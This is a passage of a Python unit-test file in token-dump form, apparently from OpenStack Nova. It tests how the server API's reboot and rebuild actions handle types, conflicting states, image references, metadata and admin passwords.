name|'compute_api'
op|'.'
name|'API'
op|','
name|'method'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_test_locked_instance'
op|'('
name|'action'
op|','
name|'method'
op|'='
name|'method'
op|','
nl|'\n'
name|'body_map'
op|'='
name|'body_map'
op|','
nl|'\n'
name|'compute_api_args_map'
op|'='
name|'args_map'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_hard
dedent|''
dedent|''
name|'def'
name|'test_reboot_hard'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_soft
dedent|''
name|'def'
name|'test_reboot_soft'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"SOFT"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_incorrect_type
dedent|''
name|'def'
name|'test_reboot_incorrect_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"NOT_A_TYPE"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_missing_type
dedent|''
name|'def'
name|'test_reboot_missing_type'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_none
dedent|''
name|'def'
name|'test_reboot_none'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
name|'None'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_not_found
dedent|''
name|'def'
name|'test_reboot_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'return_server_not_found'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'str'
op|'('
name|'uuid'
op|'.'
name|'uuid4'
op|'('
op|')'
op|')'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_reboot_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_reboot
name|'def'
name|'fake_reboot'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'reboot'"
op|','
name|'fake_reboot'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_soft_with_soft_in_progress_raises_conflict
dedent|''
name|'def'
name|'test_reboot_soft_with_soft_in_progress_raises_conflict'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"SOFT"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'task_state'
op|'='
name|'task_states'
op|'.'
name|'REBOOTING'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_hard_with_soft_in_progress_does_not_raise
dedent|''
name|'def'
name|'test_reboot_hard_with_soft_in_progress_does_not_raise'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'task_state'
op|'='
name|'task_states'
op|'.'
name|'REBOOTING'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_hard_with_hard_in_progress
dedent|''
name|'def'
name|'test_reboot_hard_with_hard_in_progress'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"HARD"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'task_state'
op|'='
name|'task_states'
op|'.'
name|'REBOOTING_HARD'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_reboot_soft_with_hard_in_progress_raises_conflict
dedent|''
name|'def'
name|'test_reboot_soft_with_hard_in_progress_raises_conflict'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'reboot'
op|'='
name|'dict'
op|'('
name|'type'
op|'='
string|'"SOFT"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'task_state'
op|'='
name|'task_states'
op|'.'
name|'REBOOTING_HARD'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_reboot'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_rebuild_preserve_ephemeral
dedent|''
name|'def'
name|'_test_rebuild_preserve_ephemeral'
op|'('
name|'self'
op|','
name|'value'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_set_fake_extension'
op|'('
op|')'
newline|'\n'
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'if'
name|'value'
name|'is'
name|'not'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'['
string|"'rebuild'"
op|']'
op|'['
string|"'preserve_ephemeral'"
op|']'
op|'='
name|'value'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'_rebuild'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'_image_href'
op|','
name|'value'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_preserve_ephemeral_true
dedent|''
name|'def'
name|'test_rebuild_preserve_ephemeral_true'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_rebuild_preserve_ephemeral'
op|'('
name|'True'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_preserve_ephemeral_false
dedent|''
name|'def'
name|'test_rebuild_preserve_ephemeral_false'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_rebuild_preserve_ephemeral'
op|'('
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_preserve_ephemeral_default
dedent|''
name|'def'
name|'test_rebuild_preserve_ephemeral_default'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_rebuild_preserve_ephemeral'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accepted_minimum
dedent|''
name|'def'
name|'test_rebuild_accepted_minimum'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
name|'self_href'
op|'='
string|"'http://localhost/v2/servers/%s'"
op|'%'
name|'FAKE_UUID'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'robj'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'body'
op|'='
name|'robj'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'image'"
op|']'
op|'['
string|"'id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'adminPass'"
op|']'
op|')'
op|','
nl|'\n'
name|'CONF'
op|'.'
name|'password_length'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'robj'
op|'['
string|"'location'"
op|']'
op|','
name|'self_href'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_instance_with_image_uuid
dedent|''
name|'def'
name|'test_rebuild_instance_with_image_uuid'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'info'
op|'='
name|'dict'
op|'('
name|'image_href_in_call'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|rebuild
name|'def'
name|'rebuild'
op|'('
name|'self2'
op|','
name|'context'
op|','
name|'instance'
op|','
name|'image_href'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'info'
op|'['
string|"'image_href_in_call'"
op|']'
op|'='
name|'image_href'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|','
name|'rebuild'
op|')'
newline|'\n'
nl|'\n'
comment|"# proper local hrefs must start with 'http://localhost/v2/'"
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'rebuild'"
op|':'
op|'{'
nl|'\n'
string|"'imageRef'"
op|':'
name|'self'
op|'.'
name|'image_uuid'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'info'
op|'['
string|"'image_href_in_call'"
op|']'
op|','
name|'self'
op|'.'
name|'image_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_instance_with_image_href_uses_uuid
dedent|''
name|'def'
name|'test_rebuild_instance_with_image_href_uses_uuid'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'info'
op|'='
name|'dict'
op|'('
name|'image_href_in_call'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|rebuild
name|'def'
name|'rebuild'
op|'('
name|'self2'
op|','
name|'context'
op|','
name|'instance'
op|','
name|'image_href'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'info'
op|'['
string|"'image_href_in_call'"
op|']'
op|'='
name|'image_href'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|','
name|'rebuild'
op|')'
newline|'\n'
nl|'\n'
comment|"# proper local hrefs must start with 'http://localhost/v2/'"
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'rebuild'"
op|':'
op|'{'
nl|'\n'
string|"'imageRef'"
op|':'
name|'self'
op|'.'
name|'image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'info'
op|'['
string|"'image_href_in_call'"
op|']'
op|','
name|'self'
op|'.'
name|'image_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accepted_minimum_pass_disabled
dedent|''
name|'def'
name|'test_rebuild_accepted_minimum_pass_disabled'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# run with enable_instance_password disabled to verify adminPass'
nl|'\n'
comment|'# is missing from response. See lp bug 921814'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'enable_instance_password'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
name|'self_href'
op|'='
string|"'http://localhost/v2/servers/%s'"
op|'%'
name|'FAKE_UUID'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'robj'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'body'
op|'='
name|'robj'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'image'"
op|']'
op|'['
string|"'id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|'"adminPass"'
op|','
name|'body'
op|'['
string|"'server'"
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'robj'
op|'['
string|"'location'"
op|']'
op|','
name|'self_href'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_rebuild_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
DECL|function|fake_rebuild
name|'def'
name|'fake_rebuild'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|','
name|'fake_rebuild'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accepted_with_metadata
dedent|''
name|'def'
name|'test_rebuild_accepted_with_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'metadata'
op|'='
op|'{'
string|"'new'"
op|':'
string|"'metadata'"
op|'}'
newline|'\n'
nl|'\n'
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'metadata'
op|'='
name|'metadata'
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"metadata"'
op|':'
name|'metadata'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'metadata'"
op|']'
op|','
name|'metadata'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accepted_with_bad_metadata
dedent|''
name|'def'
name|'test_rebuild_accepted_with_bad_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"metadata"'
op|':'
string|'"stack"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_with_too_large_metadata
dedent|''
name|'def'
name|'test_rebuild_with_too_large_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"metadata"'
op|':'
op|'{'
nl|'\n'
number|'256'
op|'*'
string|'"k"'
op|':'
string|'"value"'
nl|'\n'
op|'}'
nl|'\n'
op|'}'
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'request_too_large_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
name|'self'
op|'.'
name|'req'
op|','
nl|'\n'
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_bad_entity
dedent|''
name|'def'
name|'test_rebuild_bad_entity'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageId"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_admin_pass
dedent|''
name|'def'
name|'test_rebuild_admin_pass'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"adminPass"'
op|':'
string|'"asdf"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'image'"
op|']'
op|'['
string|"'id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'adminPass'"
op|']'
op|','
string|"'asdf'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_admin_pass_pass_disabled
dedent|''
name|'def'
name|'test_rebuild_admin_pass_pass_disabled'
op|'('
name|'self'
op|')'
